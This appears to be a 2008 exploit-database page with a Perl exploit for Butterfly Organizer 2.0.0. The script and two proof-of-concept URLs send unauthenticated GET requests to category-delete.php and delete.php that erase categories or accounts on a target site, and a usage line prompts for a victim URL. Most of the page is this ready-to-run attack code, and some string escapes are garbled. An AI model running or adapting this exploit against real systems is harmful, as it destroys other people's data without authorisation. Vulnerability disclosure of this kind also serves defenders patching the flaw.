[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Butterfly Organizer 2.0.0 Arbitrary Delete (Category/Account) Exploit
# Published : 2008-06-13
# Author : Stack
# Previous Title : Mambo Component galleries 1.0 (aid) Remote SQL Injection Exploit
# Next Title : Easy-Clanpage 3.0b1 (section) Local File Inclusion Vulnerability
#!/usr/bin/perl -w
# Butterfly Organizer 2.0.0 <= Arbitrary Delete (Category/Account)
# poc for del Ctegory : http://localhost/organizer/category-delete.php?tablehere=[NAME OF CATEGORY]&is_js_confirmed=1
# poc for del Account : http://localhost/organizer//delete.php?id=[id of account]&mytable=[NAME OF CATEGORY]
########################################
#[*] Founded & Exploited by : Stack
########################################
# SIMPLE EXPLOIT WITH PERL
system("color f");
print "tt############################################################nn";
print "tt# Butterfly Organizer 2.0.0 <= Arbitrary Delete #nn";
print "tt# ( Category / Account ) #nn";
print "tt# by Stack #nn";
print "tt############################################################nn";
########################################
#----------------------------------------------------------------------------#
########################################
use LWP::UserAgent;
die "Usage: perl $0 http://victim.com/path/n" unless @ARGV;
print "n[!] Category name : ";
chomp(my $cat=<STDIN>);
$b = LWP::UserAgent->new() or die "Could not initialize browsern";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "/category-delete.php?tablehere=".$cat."&is_js_confirmed=1";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /$cat/)
{
print "n[+] Exploit failed n";}else{
print "nBrought to you by v4-team.com...n";
print "n[+] Category Deletedn";}
########################################
#------------------- Exploit exploited by Stack --------------------#
########################################
# www.Syue.com [2008-06-13]